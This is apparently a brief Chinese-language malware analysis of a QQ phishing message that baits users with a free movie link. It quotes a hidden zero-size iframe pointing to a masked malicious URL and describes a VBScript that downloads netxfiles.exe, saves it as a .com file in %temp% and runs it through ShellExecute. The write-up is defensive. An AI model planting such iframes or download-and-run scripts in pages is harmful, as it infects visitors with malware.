QQ收到如下信息:
/-------给你一个免费看黄金甲的地址不卡还清晰。
-------/
h**jj*.htm 中包含代码:
/------- <iframe height="0" width="0" src="hxxp://www.hao***soft.net/down**mm/index1**.htm"></iframe> -------/
index1**.htm 包含VBscrīpt脚本,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 netxfiles.exe,保存为 %temp%/zj1244.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
netxfiles.exe 采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo加壳
/-------